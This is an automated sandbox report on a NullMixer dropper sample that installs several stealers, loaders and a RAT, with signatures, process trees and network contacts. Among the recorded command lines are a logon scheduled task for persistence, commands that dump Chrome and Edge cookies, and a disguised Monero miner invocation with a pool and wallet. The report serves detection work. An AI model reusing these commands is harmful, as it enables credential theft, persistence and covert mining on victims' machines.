Malware Analysis Report

2024-10-19 02:13

Sample ID 231231-e2x8msbcbl
Target 281c7ba6787d047d9eff840c79c19816
SHA256 aa9b8b79b9b4e0478e85c4ae5b08c15aadea45cac7617de2c298070fd781748e
Tags
nullmixer redline sectoprat smokeloader vidar 706 olkani pub5 aspackv2 backdoor dropper infostealer rat stealer trojan upx fabookie privateloader risepro loader spyware
score
10/10

Analysis Overview

score
10/10

SHA256

aa9b8b79b9b4e0478e85c4ae5b08c15aadea45cac7617de2c298070fd781748e

Threat Level: Known bad

The file 281c7ba6787d047d9eff840c79c19816 was found to be: Known bad.

Malicious Activity Summary

RedLine

Vidar

NullMixer

Fabookie

SectopRAT

SmokeLoader

RedLine payload

PrivateLoader

SectopRAT payload

Detect Fabookie payload

RisePro

Nirsoft

Vidar Stealer

UPX packed file

ASPack v2.12-2.42

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Program crash

Unsigned PE

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-31 04:26

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-31 04:26

Reported

2024-01-02 05:17

Platform

win7-20231129-en

Max time kernel

0s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe"

Signatures

NullMixer

dropper nullmixer

RedLine

infostealer redline

RedLine payload

SectopRAT

trojan rat sectoprat

SectopRAT payload

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Nirsoft

Vidar Stealer

stealer

ASPack v2.12-2.42

aspackv2

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

UPX packed file

upx

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A api.db-ip.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1748 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1996 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe

Processes

C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe

"C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_1.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_1.exe" -a

C:\Users\Admin\AppData\Local\Temp\is-R0QKR.tmp\sonia_5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-R0QKR.tmp\sonia_5.tmp" /SL5="$201D8,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_5.exe"

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_8.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704172488 0

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_9.exe

sonia_9.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 424

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_5.exe

sonia_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_3.exe

sonia_3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_7.exe

sonia_7.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_8.exe

sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_4.exe

sonia_4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_6.exe

sonia_6.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_1.exe

sonia_1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_7.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_2.exe

sonia_2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_3.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_1.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 956

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

Network

Files

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-31 04:26

Reported

2024-01-02 05:17

Platform

win10v2004-20231215-en

Max time kernel

32s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe"

Signatures

Detect Fabookie payload


Fabookie

spyware stealer fabookie

NullMixer

dropper nullmixer

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload


RisePro

stealer risepro

SectopRAT

trojan rat sectoprat

SectopRAT payload


SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Nirsoft


Vidar Stealer

stealer

ASPack v2.12-2.42

aspackv2

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe N/A

UPX packed file

upx

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1412 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2252 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe
PID 2176 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe
PID 1636 wrote to memory of 4252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe
PID 2668 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_3.exe
PID 2080 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_4.exe
PID 3868 wrote to memory of 1588 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe
PID 4704 wrote to memory of 4372 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_9.exe
PID 552 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_7.exe
PID 552 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_7.exe
PID 552 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_7.exe
PID 4608 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe
PID 4608 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe
PID 4608 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe
PID 1504 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_6.exe
PID 1504 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_6.exe
PID 4252 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe
PID 4252 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe
PID 4252 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe
PID 1588 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe C:\Users\Admin\AppData\Local\Temp\is-QVQSG.tmp\sonia_5.tmp
PID 1588 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe C:\Users\Admin\AppData\Local\Temp\is-QVQSG.tmp\sonia_5.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe

"C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_9.exe

sonia_9.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_7.exe

sonia_7.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe

sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_6.exe

sonia_6.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe

sonia_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_3.exe

sonia_3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_4.exe

sonia_4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe

sonia_1.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe

sonia_2.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe" -a

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_1.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2176 -ip 2176

C:\Users\Admin\AppData\Local\Temp\is-QVQSG.tmp\sonia_5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QVQSG.tmp\sonia_5.tmp" /SL5="$8002E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 560

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704172546 0

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3756 -ip 3756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 1584

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 149.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 watira.xyz udp
N/A 127.0.0.1:52799 tcp
N/A 127.0.0.1:52801 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 208.95.112.1:80 ip-api.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 superstationcity.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 53.96.141.3.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
DE 194.163.135.248:80 superstationcity.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 18.154.114.74.in-addr.arpa udp
NL 37.0.8.235:80 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 aucmoney.com udp
US 8.8.8.8:53 thegymmum.com udp
US 8.8.8.8:53 atvcampingtrips.com udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 kuapakualaman.com udp
US 8.8.8.8:53 renatazarazua.com udp
US 8.8.8.8:53 nasufmutlu.com udp
US 8.8.8.8:53 113.132.67.172.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
DE 194.163.135.248:80 superstationcity.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
NL 37.0.11.8:80 tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 most-fast-link-download.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 f.youtuuee.com udp
